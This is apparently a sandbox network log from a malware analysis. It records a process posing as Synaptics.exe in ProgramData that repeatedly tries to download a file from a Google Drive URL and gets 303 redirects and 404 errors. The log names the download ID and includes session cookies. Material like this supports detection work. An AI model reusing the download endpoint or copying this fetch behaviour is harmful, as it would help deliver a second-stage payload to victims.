                                                                                                              X-GUploader-UploadID: AFiumC4-ILUznPsxscn6A_BvndyEMB5wL-LjkUSqkN8xkao-w5mg3jMATOekOjuJvjneUkwc
                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                              Pragma: no-cache
                                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                              Date: Mon, 30 Dec 2024 10:36:08 GMT
                                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-bSWHPYHT7FsELXaRu34HKg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                              Content-Length: 1652
                                                                                                              Server: UploadServer
                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                              Content-Security-Policy: sandbox allow-scripts
                                                                                                              Connection: close
                                                                                                              2024-12-30 10:36:08 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                                              Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                              2024-12-30 10:36:08 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 2d 62 77 45 6f 76 71 4f 49 55 46 32 53 49 6b 6d 2d 54 47 76 51 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                                              Data Ascii: t Found)!!1</title><style nonce="-bwEovqOIUF2SIkm-TGvQA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                              2024-12-30 10:36:08 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                              Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              49192.168.2.449810142.250.186.1424436908C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-30 10:36:08 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                              User-Agent: Synaptics.exe
                                                                                                              Host: docs.google.com
                                                                                                              Cache-Control: no-cache
                                                                                                              Cookie: NID=520=ANMwnx3g6cBhV0fFuX_RPPjvQ4YdkR1XvD6cxsmRyYxgLijsrrji59j-0abUEVZdnYs8a0qNq0sA_OsXLmRfKnekCyrRWoZqfgI2KO46A4ZYYOhuxohr01hnix2SH6LZz_KDx8BxOffaeHLMuzZ3yHZGijtnZrgvuwg0VPQu9C0ipgeEOJ035FM
                                                                                                              2024-12-30 10:36:09 UTC1314INHTTP/1.1 303 See Other
                                                                                                              Content-Type: application/binary
                                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                              Pragma: no-cache
                                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                              Date: Mon, 30 Dec 2024 10:36:08 GMT
                                                                                                              Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-JKju_-1VPKwo3SaqVMUrLg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                              Server: ESF
                                                                                                              Content-Length: 0
                                                                                                              X-XSS-Protection: 0
                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                              X-Content-Type-Options: nosniff
                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                              Connection: close


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              50192.168.2.449812142.250.186.974436908C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-30 10:36:08 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                              User-Agent: Synaptics.exe
                                                                                                              Cache-Control: no-cache
                                                                                                              Host: drive.usercontent.google.com
                                                                                                              Connection: Keep-Alive
                                                                                                              Cookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                                                                                              2024-12-30 10:36:09 UTC1250INHTTP/1.1 404 Not Found
                                                                                                              X-GUploader-UploadID: AFiumC4rmfEY4Ike4b-cNVQpbOMTT7mXzYPfunRfmn0WirMXH8dWQ6GfRhHKCkeOnOqnc78k5wVs3X4
                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                              Pragma: no-cache
                                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                              Date: Mon, 30 Dec 2024 10:36:09 GMT
                                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-fGmiZ8GbVL8ptBSV4DmuJA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                              Content-Length: 1652
                                                                                                              Server: UploadServer
                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                              Content-Security-Policy: sandbox allow-scripts
                                                                                                              Connection: close
                                                                                                              2024-12-30 10:36:09 UTC140INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20
                                                                                                              Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                              2024-12-30 10:36:09 UTC1390INData Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 72 54 4f 39 37 4f 59 6e 76 63 30 37 4e 43 42 62 56 53 69 55 53 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b
                                                                                                              Data Ascii: 404 (Not Found)!!1</title><style nonce="rTO97OYnvc07NCBbVSiUSg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                              2024-12-30 10:36:09 UTC122INData Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                              Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              51192.168.2.449811142.250.186.1424436908C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-30 10:36:08 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                              User-Agent: Synaptics.exe
                                                                                                              Host: docs.google.com
                                                                                                              Cache-Control: no-cache
                                                                                                              Cookie: NID=520=ANMwnx3g6cBhV0fFuX_RPPjvQ4YdkR1XvD6cxsmRyYxgLijsrrji59j-0abUEVZdnYs8a0qNq0sA_OsXLmRfKnekCyrRWoZqfgI2KO46A4ZYYOhuxohr01hnix2SH6LZz_KDx8BxOffaeHLMuzZ3yHZGijtnZrgvuwg0VPQu9C0ipgeEOJ035FM
                                                                                                              2024-12-30 10:36:09 UTC1314INHTTP/1.1 303 See Other
                                                                                                              Content-Type: application/binary
                                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                              Pragma: no-cache
                                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                              Date: Mon, 30 Dec 2024 10:36:09 GMT
                                                                                                              Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-ZEgZaOY8l_mc-oY0o0yzzQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                              Server: ESF
                                                                                                              Content-Length: 0
                                                                                                              X-XSS-Protection: 0
                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                              X-Content-Type-Options: nosniff
                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                              Connection: close


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              52192.168.2.449814142.250.186.974436908C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-30 10:36:09 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                              User-Agent: Synaptics.exe
                                                                                                              Cache-Control: no-cache
                                                                                                              Host: drive.usercontent.google.com
                                                                                                              Connection: Keep-Alive
                                                                                                              Cookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                                                                                              2024-12-30 10:36:09 UTC1243INHTTP/1.1 404 Not Found
                                                                                                              X-GUploader-UploadID: AFiumC42b2AxuBfNaZkuZYzUo4NjnozgisAXBuyrU-KcnxmU1R8rKZ3s6Sme1NwcfvzTYTRG
                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                              Pragma: no-cache
                                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                              Date: Mon, 30 Dec 2024 10:36:09 GMT
                                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-eDPxUEMdja1HvDb91tBawA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                                              Content-Length: 1652
                                                                                                              Server: UploadServer
                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                              Content-Security-Policy: sandbox allow-scripts
                                                                                                              Connection: close
                                                                                                              2024-12-30 10:36:09 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                                              Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                              2024-12-30 10:36:09 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 51 71 45 4d 2d 34 4a 36 74 62 6c 79 58 72 67 67 30 33 45 35 71 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                                              Data Ascii: t Found)!!1</title><style nonce="QqEM-4J6tblyXrgg03E5qQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                              2024-12-30 10:36:09 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                              Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              53192.168.2.449815142.250.186.1424436908C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-30 10:36:09 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                              User-Agent: Synaptics.exe
                                                                                                              Host: docs.google.com
                                                                                                              Cache-Control: no-cache
                                                                                                              Cookie: NID=520=ANMwnx3g6cBhV0fFuX_RPPjvQ4YdkR1XvD6cxsmRyYxgLijsrrji59j-0abUEVZdnYs8a0qNq0sA_OsXLmRfKnekCyrRWoZqfgI2KO46A4ZYYOhuxohr01hnix2SH6LZz_KDx8BxOffaeHLMuzZ3yHZGijtnZrgvuwg0VPQu9C0ipgeEOJ035FM
                                                                                                              2024-12-30 10:36:10 UTC1314INHTTP/1.1 303 See Other
                                                                                                              Content-Type: application/binary
                                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                              Pragma: no-cache
                                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                              Date: Mon, 30 Dec 2024 10:36:10 GMT
                                                                                                              Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-_9LMm-X5a9qO0mwCgm_x-A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                                              Server: ESF
                                                                                                              Content-Length: 0
                                                                                                              X-XSS-Protection: 0
                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                              X-Content-Type-Options: nosniff
                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                              Connection: close


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              54192.168.2.449817142.250.186.1424436908C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-30 10:36:09 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                              User-Agent: Synaptics.exe
                                                                                                              Host: docs.google.com
                                                                                                              Cache-Control: no-cache
                                                                                                              Cookie: NID=520=ANMwnx3g6cBhV0fFuX_RPPjvQ4YdkR1XvD6cxsmRyYxgLijsrrji59j-0abUEVZdnYs8a0qNq0sA_OsXLmRfKnekCyrRWoZqfgI2KO46A4ZYYOhuxohr01hnix2SH6LZz_KDx8BxOffaeHLMuzZ3yHZGijtnZrgvuwg0VPQu9C0ipgeEOJ035FM
                                                                                                              2024-12-30 10:36:10 UTC1314INHTTP/1.1 303 See Other
                                                                                                              Content-Type: application/binary
                                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                              Pragma: no-cache
                                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                              Date: Mon, 30 Dec 2024 10:36:10 GMT
                                                                                                              Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-9Gxo1M__mou8JlmApqa5QA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                                              Server: ESF
                                                                                                              Content-Length: 0
                                                                                                              X-XSS-Protection: 0
                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                              X-Content-Type-Options: nosniff
                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                              Connection: close


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              55192.168.2.449816142.250.186.974436908C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-30 10:36:09 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                              User-Agent: Synaptics.exe
                                                                                                              Cache-Control: no-cache
                                                                                                              Host: drive.usercontent.google.com
                                                                                                              Connection: Keep-Alive
                                                                                                              Cookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                                                                                              2024-12-30 10:36:10 UTC1243INHTTP/1.1 404 Not Found
                                                                                                              X-GUploader-UploadID: AFiumC6fgbHQUxNcXJy246NXrNnAPRoUWAuorDDX9rRnKvzjp0-bhNEJeVhmBv7BuZZ1DwBo
                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                              Pragma: no-cache
                                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                              Date: Mon, 30 Dec 2024 10:36:10 GMT
                                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-l6RzfsO5Iu364I2j4ZIaUw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                              Content-Length: 1652
                                                                                                              Server: UploadServer
                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                              Content-Security-Policy: sandbox allow-scripts
                                                                                                              Connection: close
